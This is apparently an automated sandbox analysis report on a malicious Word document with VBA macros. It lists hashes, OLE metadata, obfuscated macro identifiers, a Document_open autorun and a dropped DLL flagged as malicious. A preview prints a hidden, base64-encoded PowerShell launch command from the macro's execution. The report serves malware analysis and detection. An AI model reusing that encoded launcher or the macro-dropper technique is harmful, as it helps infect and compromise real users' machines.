                                                                                                                              Entropy (8bit):5.028707508716467
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:yS0NsjXDzcYlm8nuVF9M1GBgovhkssrx0DYQ4+B5mxEk:6kXDTUvhk7x0Dxlm1
                                                                                                                              MD5:870345A71AAB7D049F25966FF1779C26
                                                                                                                              SHA1:8BAE23F02C27D9A661D44B25584E5196752051AD
                                                                                                                              SHA-256:FCA635B949AAA3782CBD70493B1CBBF8CBBB1DB4D6183136DF335A615F081B09
                                                                                                                              SHA-512:A5BEADCAB0A2F4C1663830365F5940102F653202A14316E85A6A9AF9D3351D04045E8D9D354D82C39FD6AB942AF4BFDA04F78789D2B93B7A3A75E7ED9B9BD13E
                                                                                                                              Malicious:false
                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210201232511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACk
                                                                                                                              C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):228352
                                                                                                                              Entropy (8bit):7.401227982577977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:Q2JsbTQ7oRiTPy6758RAuiGsIwuVKiCJ0/ykN8t+XPjf7z3I43:Q2JCIoRSi1iGsuwfJ0KkU+XPjQ
                                                                                                                              MD5:1BCF5E93610C3774A59240E10932A252
                                                                                                                              SHA1:61D3C80B5E71F136E2D7039AA9D5F41E2595BBF0
                                                                                                                              SHA-256:F5736A1F0C40D3609BA0C394FE424795D71E19A6B57AB55CA9C6F49B79485C27
                                                                                                                              SHA-512:1D57B47A0134D09677AA18356A0A351D335414901BB8B35DA31ACFA43CFBB3F1C76ECEB14F98E915495ECB923BEA23C3F9BC5D711F041F44DCAD6142071B23F2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J..........uz.......`.......................................W..............................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data...d2..........................@....rsrc...............................@..@.reloc...".......$...X..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: extensible Automotive generate withdrawal Wooden Global architecture, Author: Chlo Gerard, Template: Normal.dotm, Last Saved By: Thomas Roussel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
                                                                                                                              Entropy (8bit):6.406111255633529
                                                                                                                              TrID:
                                                                                                                              • Microsoft Word document (32009/1) 54.23%
                                                                                                                              • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                              File name:v22Pc0qA.doc.doc
                                                                                                                              File size:207253
                                                                                                                              MD5:7a7d325948481b0557b035249bf5c96a
                                                                                                                              SHA1:0529727ffad8388fc94155d1652ca65189cda5df
                                                                                                                              SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
                                                                                                                              SHA512:45cf99bad712aaace79010c728705117fc12ac76d76f625716115a19477ce40de5d18ecaca8e84ea55c388d4436d4827ab63c660df86dcdc01c5c8ce975dda44
                                                                                                                              SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5bkxU7PoU2l65gsaTs:Y9ufsfgIf0pLkU7PoU2lIgsaTs
                                                                                                                              File Content Preview:........................>.......................9...........<...............6...7...8..........................................................................................................................................................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:74f4c4c6c1cac4d8

                                                                                                                              Static OLE Info

                                                                                                                              General

                                                                                                                              Document Type:OLE
                                                                                                                              Number of OLE Files:1

                                                                                                                              OLE File "v22Pc0qA.doc.doc"

                                                                                                                              Indicators

                                                                                                                              Has Summary Info:True
                                                                                                                              Application Name:Microsoft Office Word
                                                                                                                              Encrypted Document:False
                                                                                                                              Contains Word Document Stream:True
                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                              Contains Visio Document Stream:False
                                                                                                                              Contains ObjectPool Stream:
                                                                                                                              Flash Objects Count:
                                                                                                                              Contains VBA Macros:True

                                                                                                                              Summary

                                                                                                                              Code Page:1252
                                                                                                                              Title:
                                                                                                                              Subject:extensible Automotive generate withdrawal Wooden Global architecture
                                                                                                                              Author:Chlo Gerard
                                                                                                                              Keywords:
                                                                                                                              Comments:
                                                                                                                              Template:Normal.dotm
                                                                                                                              Last Saved By:Thomas Roussel
                                                                                                                              Revion Number:1
                                                                                                                              Total Edit Time:0
                                                                                                                              Create Time:2020-12-21 13:51:00
                                                                                                                              Last Saved Time:2020-12-21 13:51:00
                                                                                                                              Number of Pages:1
                                                                                                                              Number of Words:5943
                                                                                                                              Number of Characters:33877
                                                                                                                              Creating Application:Microsoft Office Word
                                                                                                                              Security:8

                                                                                                                              Document Summary

                                                                                                                              Document Code Page:1252
                                                                                                                              Number of Lines:282
                                                                                                                              Number of Paragraphs:79
                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                              Company:
                                                                                                                              Contains Dirty Links:False
                                                                                                                              Shared Document:False
                                                                                                                              Changed Hyperlinks:False
                                                                                                                              Application Version:983040

                                                                                                                              Streams with VBA

                                                                                                                              VBA File Name: UserForm1, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm2, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm3, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm4, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm5, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Dk5att0cu_9jsb
                                                                                                                              VBA File Name:Dk5att0cu_9jsb
                                                                                                                              Stream Size:1114
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . T 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 11 c0 54 37 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              Private
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Creatable
                                                                                                                              VB_Name
                                                                                                                              Document_open()
                                                                                                                              VB_Customizable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Lxvinhyq0hu0i
                                                                                                                              VBA File Name:Lxvinhyq0hu0i
                                                                                                                              Stream Size:16887
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 1f 30 00 00 00 00 00 00 01 00 00 00 11 c0 34 97 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                                                                                                                              MVKdEA
                                                                                                                              "iYrsMDeBF.SIoiFJ.zdnAB"
                                                                                                                              "cfmqZH.yHFfXEyD.iUezXEC"
                                                                                                                              TFhBESFIX
                                                                                                                              yqztDCl:
                                                                                                                              VBA.Replace
                                                                                                                              jSGTCFaK:
                                                                                                                              hVRJE
                                                                                                                              "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                                                                                                                              RZyrFJ
                                                                                                                              sbVXlJE:
                                                                                                                              aDFRF
                                                                                                                              KAedr
                                                                                                                              "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                                                                                                                              RMyrFd
                                                                                                                              qLfbCLdC
                                                                                                                              GLxLQDxBB
                                                                                                                              KiOKSNEG:
                                                                                                                              PrigNJEs
                                                                                                                              nCWvB
                                                                                                                              RhecDCNb:
                                                                                                                              YaqiI
                                                                                                                              yDuIa
                                                                                                                              aDFRF:
                                                                                                                              Binary
                                                                                                                              hckCCJvD:
                                                                                                                              UbSMfKFUj
                                                                                                                              CtmaxWDYG
                                                                                                                              dcClB:
                                                                                                                              VipWJ:
                                                                                                                              jSGTCFaK
                                                                                                                              IpXGAFACy
                                                                                                                              jWIUH
                                                                                                                              yqztDCl
                                                                                                                              "aguCEDpx.XlUcBUj.UPogGhX"
                                                                                                                              "zSasAJg.LDOIU.vvZOFJ"
                                                                                                                              "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                                                                                                                              wVgZExzI
                                                                                                                              "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                                                                                                                              hkpqEBd
                                                                                                                              FEJNFPMF
                                                                                                                              uYPoFiE
                                                                                                                              XvETIO
                                                                                                                              pxMXSJrIc:
                                                                                                                              dcClB
                                                                                                                              VIuzQOE:
                                                                                                                              "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                                                                                                                              "gEMlED.skZhEggk.ZyWBD"
                                                                                                                              FzSmxUBI:
                                                                                                                              IIJMEYBZ
                                                                                                                              JubeVI
                                                                                                                              "QWkiJ.sNlBSC.hsUWFP"
                                                                                                                              BRfTAJ
                                                                                                                              lOYxmwBA
                                                                                                                              IIJMEYBZ:
                                                                                                                              UFEneAQF
                                                                                                                              FzOAw
                                                                                                                              "eKLzaJBKG.eCACJBH.NfdiGiC"
                                                                                                                              Resume
                                                                                                                              iAKfBEDC:
                                                                                                                              QqQRUOBIy
                                                                                                                              "nRpjIJ.tkIcCAbCF.hJzbH"
                                                                                                                              yHCsJFACD
                                                                                                                              lfjdHL
                                                                                                                              mxDIrHC
                                                                                                                              hckCCJvD
                                                                                                                              DxojDGC
                                                                                                                              rDIcxFB:
                                                                                                                              NwlcQEELI
                                                                                                                              eYojg
                                                                                                                              JXblRBK:
                                                                                                                              kaqktK
                                                                                                                              olbDbIA:
                                                                                                                              nCWvB:
                                                                                                                              "bfJqAKr.cLEdAF.oYWiAFEQ"
                                                                                                                              lbHAbDF:
                                                                                                                              ZqNrvaa:
                                                                                                                              kmOCpG
                                                                                                                              FoTWuD:
                                                                                                                              ChrW(wdKeyS)
                                                                                                                              bVAPDAD
                                                                                                                              "ZbLbn.FiqyBGPC.ROWoCHF"
                                                                                                                              cHoJJlDBJ
                                                                                                                              "CXrJJB.OBfnW.uqEngDYV"
                                                                                                                              "BpfOu.TVoTOHe.EzrPEDJ"
                                                                                                                              "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                                                                                                                              ObUqEpuD:
                                                                                                                              NwlcQEELI:
                                                                                                                              "pJlGBGe.jIXSWL.jkAfAEIf"
                                                                                                                              "hSzhx.onZqBBzG.aRYCE"
                                                                                                                              VB_Name
                                                                                                                              AJXECAN
                                                                                                                              ZxZNGGUBd:
                                                                                                                              IaIuovC:
                                                                                                                              WnWcBBeF
                                                                                                                              IaIuovC
                                                                                                                              "TNqlmI.VQzWNlJC.IuleF"
                                                                                                                              gvnNjywC:
                                                                                                                              "ErIlZF.tHbIE.idUJKwuOi"
                                                                                                                              oVlMEI
                                                                                                                              NJlsEIS
                                                                                                                              JxVVF
                                                                                                                              RWlYF
                                                                                                                              "ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
                                                                                                                              "KeuGF.APuwUHxl.GiUhBFB"
                                                                                                                              fGzqP:
                                                                                                                              uJknJZHFB:
                                                                                                                              yJzxGZak
                                                                                                                              PksXIAC:
                                                                                                                              "obWgmFILu.KLSrfFHDI.nylpN"
                                                                                                                              "AcrzGL.zwvmHG.MqsxCr"
                                                                                                                              UbSMfKFUj:
                                                                                                                              kmOCpG:
                                                                                                                              "XIjXFFFIJ.jYAPtLTyj.PLtLFT"
                                                                                                                              Attribute
                                                                                                                              lfRjBXXFA:
                                                                                                                              lfRjBXXFA
                                                                                                                              fGzqP
                                                                                                                              VIuzQOE
                                                                                                                              RMyrFd:
                                                                                                                              JXblRBK
                                                                                                                              YEAwF
                                                                                                                              nhVWCG:
                                                                                                                              "BiUfo.vtUVwAWGC.hUSLqGGIO"
                                                                                                                              MVKdEA:
                                                                                                                              "oScEJFIH.GpYhI.ZPvpk"
                                                                                                                              iZGGBKjGH
                                                                                                                              "DcfnrACC.XeVEC.QdSVCUJ"
                                                                                                                              ohdoz
                                                                                                                              uJtiAP
                                                                                                                              "WWmJGCEWG.XCrNGJ.ficHzH"
                                                                                                                              cIiApH
                                                                                                                              LjVfJ
                                                                                                                              qLfbCLdC:
                                                                                                                              zHYrT
                                                                                                                              sbVXlJE
                                                                                                                              sCwjljF
                                                                                                                              JHGODJK
                                                                                                                              XvETIO:
                                                                                                                              BrrXfI
                                                                                                                              JzcNByvAX
                                                                                                                              "DbRqLDGCg.nxwYCaF.sZZrJ"
                                                                                                                              nmHtBKNIA
                                                                                                                              uJknJZHFB
                                                                                                                              kMzKEr:
                                                                                                                              pxMXSJrIc
                                                                                                                              "pPiJFZzI.dfizGxy.NRcSrA"
                                                                                                                              KiOKSNEG
                                                                                                                              SEnkGD
                                                                                                                              "nYskWX.aOSpmAFIB.kCBksCD"
                                                                                                                              "gjoHAq.pgiDH.iYppCzD"
                                                                                                                              HMJCGGAMi
                                                                                                                              "RSIiW.JGdvBjSmB.WubTFJ"
                                                                                                                              xuAPcBl
                                                                                                                              xuAPcBl:
                                                                                                                              jJMCQJDB:
                                                                                                                              nhVWCG
                                                                                                                              LjVfJ:
                                                                                                                              zHYrT:
                                                                                                                              kMzKEr
                                                                                                                              lbHAbDF
                                                                                                                              "YNveE.qehAq.fHHuGb"
                                                                                                                              "eHqqE.nCeMDET.kZWuQGE"
                                                                                                                              ZuuLFE
                                                                                                                              EhrmhuB
                                                                                                                              "NhKID.SYBhRIEGg.qCLeaM"
                                                                                                                              "NPkiDT.CkfBJvJ.bgnwZAB"
                                                                                                                              "fNHCB.hbEBBG.feKiwC"
                                                                                                                              IGamxCG
                                                                                                                              ZuuLFE:
                                                                                                                              jWIUH:
                                                                                                                              "MiwKq.hkWsDcI.YmoTAGR"
                                                                                                                              "NgFRIFlFQ.imXZAJE.tzzlC"
                                                                                                                              RhecDCNb
                                                                                                                              nmHtBKNIA:
                                                                                                                              WpdDxhHa
                                                                                                                              VipWJ
                                                                                                                              PksXIAC
                                                                                                                              String
                                                                                                                              gvnNjywC
                                                                                                                              eTuZIDG
                                                                                                                              kySRBFED
                                                                                                                              ObUqEpuD
                                                                                                                              uWAjsYwtG
                                                                                                                              FzSmxUBI
                                                                                                                              YEAwF:
                                                                                                                              "dcEwJD.cZCpC.kfXrIC"
                                                                                                                              FEJNFPMF:
                                                                                                                              "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                                                                                                                              "NipqJ.tIztQI.WMXjaJ"
                                                                                                                              yDuIa:
                                                                                                                              IpXGAFACy:
                                                                                                                              "qKjdvEDq.lYfhW.eTVwADADD"
                                                                                                                              yDAMCG
                                                                                                                              ZqNrvaa
                                                                                                                              TLfxGCa
                                                                                                                              EiViHgGI
                                                                                                                              IJSGH
                                                                                                                              iAKfBEDC
                                                                                                                              TFhBESFIX:
                                                                                                                              GwJXIC
                                                                                                                              Error
                                                                                                                              "dZEvHBM.HWisMo.kLMoA"
                                                                                                                              "OqezBEGR.dKnPpE.XZiNID"
                                                                                                                              dThRBEAv
                                                                                                                              rDIcxFB
                                                                                                                              JKIoD
                                                                                                                              cIiApH:
                                                                                                                              QyqGnByH
                                                                                                                              ahjNCC
                                                                                                                              yDAMCG:
                                                                                                                              Close
                                                                                                                              jJMCQJDB
                                                                                                                              "WWgXBJbAL.psfjJF.iosTZOn"
                                                                                                                              yHCsJFACD:
                                                                                                                              ZxZNGGUBd
                                                                                                                              Function
                                                                                                                              FoTWuD
                                                                                                                              hVRJE:
                                                                                                                              "dCIAJyHr.uGSFGCFE.hgENI"
                                                                                                                              olbDbIA
                                                                                                                              OXtlEDLCd
                                                                                                                              zoqaA
                                                                                                                              "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                                                                                                                              "cklcdFF.ljzQFAII.yhDYGICo"
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm1, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 6e ff 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm2, Stream Size: 1155
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:1155
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 a8 f8 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm3, Stream Size: 1159
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:1159
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . ^ I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 5e 49 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm4, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 57 91 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
